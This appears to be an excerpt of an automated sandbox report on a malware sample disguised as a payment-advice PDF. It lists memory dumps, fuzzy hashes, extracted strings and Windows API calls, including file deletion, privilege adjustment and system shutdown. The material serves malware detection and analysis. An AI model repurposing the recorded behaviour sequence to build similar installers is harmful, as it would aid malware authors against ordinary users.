                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 450156ac775ee63337cbfd69b99c47a03408dfdb5cde4e86388df78e669632dc
                                                                                                                                    • Instruction ID: 619023d53a0819196b033ee0d4f38ad8be56674d3abf97247eef3534b2c95d8d
                                                                                                                                    • Opcode Fuzzy Hash: 450156ac775ee63337cbfd69b99c47a03408dfdb5cde4e86388df78e669632dc
                                                                                                                                    • Instruction Fuzzy Hash: 10C0C0322416101F4618A31CB4404DEC6C0CDC6310310CD37F014D322C0E00AC8B41CD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a973fcf65ebe6c431c0443340d881c80fc04029371f81be75a87513a18e8d77d
                                                                                                                                    • Instruction ID: f27c280536d17c3df8e00bb2af03d5fe7311be52d40146606c4cd409fce6bb40
                                                                                                                                    • Opcode Fuzzy Hash: a973fcf65ebe6c431c0443340d881c80fc04029371f81be75a87513a18e8d77d
                                                                                                                                    • Instruction Fuzzy Hash: C2D0C9709062099BC744DBA8E805AA9B778AB47316F4051A8A51863251DB715E10D695
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2a78931b592fb8559b87fb61f76388bd748e500650dac2fea06115f1527c6844
                                                                                                                                    • Instruction ID: aa12547682f5859112b982ad1be94df4d411666d0235f09ba17ca5cccdd971c7
                                                                                                                                    • Opcode Fuzzy Hash: 2a78931b592fb8559b87fb61f76388bd748e500650dac2fea06115f1527c6844
                                                                                                                                    • Instruction Fuzzy Hash: D1C08C74001E0A8BE2482F90BC0CBB9B7B8B707323FC82D10F10C028708BB85414DB44
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4c878e3c606e5dd4146857613123572fca22efa034998e06f2af300ae5eaf3b5
                                                                                                                                    • Instruction ID: bca7df8720ac2bd924a9abb94085782868891e6498574a48cf80c1ed5bb4a033
                                                                                                                                    • Opcode Fuzzy Hash: 4c878e3c606e5dd4146857613123572fca22efa034998e06f2af300ae5eaf3b5
                                                                                                                                    • Instruction Fuzzy Hash: 73C08C302A82048FE300AB1DC984A2173ACEF85B04F2018E0F2048BA7ACB22FC004A44
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 28bae3f6c56e6336679db68a813769f762f8486db5cef704548a15346f6e2767
                                                                                                                                    • Instruction ID: df43322672d36149ad5718bdc14c13893e026c77f3420c79a8695e0c95576dc1
                                                                                                                                    • Opcode Fuzzy Hash: 28bae3f6c56e6336679db68a813769f762f8486db5cef704548a15346f6e2767
                                                                                                                                    • Instruction Fuzzy Hash: C0C012300543084EC705E766ED55555B72EA7802007408620A1050667EDFB4598B4BE0
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                                    • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                    • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                    • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                                    • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                                    • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                                    • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                                    • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                    • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                                    • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                                    • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                                    • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                                    • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                    • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                    • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                    • API String ID: 3586999533-3972089011
                                                                                                                                    • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                    • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                    • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                    • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                    • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                    • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                    • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                    • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$0os$Ljs$Ljs$Ljs$Ljs$Ljs$Ljs$Ljs$Ljs$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                                                    • API String ID: 0-2607182740
                                                                                                                                    • Opcode ID: 1353f00c5d23f0aad6af724525f1e403d63bfdcd560c8e15774a8f0ff9506f92
                                                                                                                                    • Instruction ID: bede6d2f124cbce75b07435d2da33ab70f5a1a99f59787ad33b17f507bf49768
                                                                                                                                    • Opcode Fuzzy Hash: 1353f00c5d23f0aad6af724525f1e403d63bfdcd560c8e15774a8f0ff9506f92
                                                                                                                                    • Instruction Fuzzy Hash: 41329F74E00218CFEB58CF65C994B9DBBB2BF89300F1085A9D409AB365DB759E85DF10
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
                                                                                                                                    • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
                                                                                                                                    • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                                                    • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                    • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                    • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                    • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$0os$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                                                    • API String ID: 0-1369156558
                                                                                                                                    • Opcode ID: 81dc3381992235758611658e52e03e17b140734022e55458381fa68cfb589d60
                                                                                                                                    • Instruction ID: 971cac2fb82609ec77ded863ec3a9f37faa6c74ba0b8c214136758392ff3e971
                                                                                                                                    • Opcode Fuzzy Hash: 81dc3381992235758611658e52e03e17b140734022e55458381fa68cfb589d60
                                                                                                                                    • Instruction Fuzzy Hash: 66029F74E012188FEB58CF65C994BDDBBB2BF89300F1081A9D509AB365DB759E85CF10
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .5vq$BH7
                                                                                                                                    • API String ID: 0-2157507558
                                                                                                                                    • Opcode ID: 60bebd03db6b6958938878dfcbf087bad1b5aacd82820708831ec7b8e5c4f631
                                                                                                                                    • Instruction ID: 914fa3645d14ed66d500b4c50f0f8c1faee3f90faf0e9d4f20ea573f03366f4e
                                                                                                                                    • Opcode Fuzzy Hash: 60bebd03db6b6958938878dfcbf087bad1b5aacd82820708831ec7b8e5c4f631
                                                                                                                                    • Instruction Fuzzy Hash: C3629E74E01268CFDB64DF65C884B9DBBB2BB89301F1085EAD409A7355DB31AE82DF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Q7,
                                                                                                                                    • API String ID: 0-4224115770
                                                                                                                                    • Opcode ID: e15a3b873234bc409ea66bbdcc10989aaa0a2ec37b2ae88d79c9cb5a1a5df6bb
                                                                                                                                    • Instruction ID: a740f1b9d561c0669cbc462485a917ddded2f24446b7fe0250ad9c668f693817
                                                                                                                                    • Opcode Fuzzy Hash: e15a3b873234bc409ea66bbdcc10989aaa0a2ec37b2ae88d79c9cb5a1a5df6bb
                                                                                                                                    • Instruction Fuzzy Hash: FCC1B074E00258CFDB54DFA5C994BDDBBB2AF89300F2081A9D418BB355DB35AA86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f05d1ed6d233952a6447d2705b59b2e0bddcb7f27caca3a39c38a2f468a2a9c2
                                                                                                                                    • Instruction ID: ff2ff46970a15a2409d4db49ce41865f2f4c0070b2551f551ca0506efdb7424c
                                                                                                                                    • Opcode Fuzzy Hash: f05d1ed6d233952a6447d2705b59b2e0bddcb7f27caca3a39c38a2f468a2a9c2
                                                                                                                                    • Instruction Fuzzy Hash: 21C1BF74E00218CFDB54DFA5C994BDDBBB2AF89300F1081A9D418BB365DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0f9739d2f43891c992e9e36a898a56358fa0005291bae1d1804138fd470ea835
                                                                                                                                    • Instruction ID: 5aeb33ef5351b3d1b356b31ec0ce99df1846f92c6fe9e71499be82f7badf6619
                                                                                                                                    • Opcode Fuzzy Hash: 0f9739d2f43891c992e9e36a898a56358fa0005291bae1d1804138fd470ea835
                                                                                                                                    • Instruction Fuzzy Hash: 82C1C074E00218CFDB54DFA5C984BDDBBB2AF89300F1081A9D418BB364DB35AA86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fd2173bbd01d025868117e7f17c9ce32a51787844ecd088f28163dc4f0a96618
                                                                                                                                    • Instruction ID: 06dc8dea9746a3a56f4be926016fb3743faacadac41a6c0a17600ff34369d7b1
                                                                                                                                    • Opcode Fuzzy Hash: fd2173bbd01d025868117e7f17c9ce32a51787844ecd088f28163dc4f0a96618
                                                                                                                                    • Instruction Fuzzy Hash: 33C1C074E01258CFDB54DFA5C994BDDBBB2AF89300F1080A9D418BB364DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 854526ae3d230f20e7dffb6dfd21ad8ba2cb436953acc961add790bad1e4ba3a
                                                                                                                                    • Instruction ID: de889aff7f2752a986fadd8cc7c4a11f48c6c675f9158b104a9e3bdac27db875
                                                                                                                                    • Opcode Fuzzy Hash: 854526ae3d230f20e7dffb6dfd21ad8ba2cb436953acc961add790bad1e4ba3a
                                                                                                                                    • Instruction Fuzzy Hash: F9C1C074E00258CFDB54DFA5C984BDDBBB2AF89300F1081A9D418BB365DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ae87823f9ed31313e63332d9ae57f1a64d26f965c4097dc72353b80cce786b5a
                                                                                                                                    • Instruction ID: 632dec12bc0758f1646c1ff2970ef646e0d243851fdca973a25bc2e69c0580e8
                                                                                                                                    • Opcode Fuzzy Hash: ae87823f9ed31313e63332d9ae57f1a64d26f965c4097dc72353b80cce786b5a
                                                                                                                                    • Instruction Fuzzy Hash: 59C1B074E00258CFDB54DFA5C994BDDBBB2AF89300F1080A9D418BB365DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9bd799c42c844afdc73ce977c7cb1967bd5218abba111ff671183fcc992cd42f
                                                                                                                                    • Instruction ID: f49b5cad6a3e97ea56637d33dbb65fa9b1698d0ce9ccc3c6954ac4d0e0288aa9
                                                                                                                                    • Opcode Fuzzy Hash: 9bd799c42c844afdc73ce977c7cb1967bd5218abba111ff671183fcc992cd42f
                                                                                                                                    • Instruction Fuzzy Hash: A5C1AF74E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D408BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d87e01666c04381a35a69cb5fa2d993970fceca84572061a8ab781542ae38fef
                                                                                                                                    • Instruction ID: d599b3f89ce10b6aa8fe271ddab87c9f86f439a2f2d4545e126b59bc62e18790
                                                                                                                                    • Opcode Fuzzy Hash: d87e01666c04381a35a69cb5fa2d993970fceca84572061a8ab781542ae38fef
                                                                                                                                    • Instruction Fuzzy Hash: D7C1B074E01218CFDB54DFA5C994B9DBBB2AF89300F1080A9D408BB365DB35AE86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b10fb2c5d8d64491c3ed2435c58e29b0973c53bb6cd435c9fd4198f35ff2a86a
                                                                                                                                    • Instruction ID: af77a77740281422e4ce7ada895a86aa89a89f03787788ce5526bd9d48e71f51
                                                                                                                                    • Opcode Fuzzy Hash: b10fb2c5d8d64491c3ed2435c58e29b0973c53bb6cd435c9fd4198f35ff2a86a
                                                                                                                                    • Instruction Fuzzy Hash: 41C1A074E01218CFDB54DFA5C994B9DBBB2AF89300F1080A9D418BB3A5DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
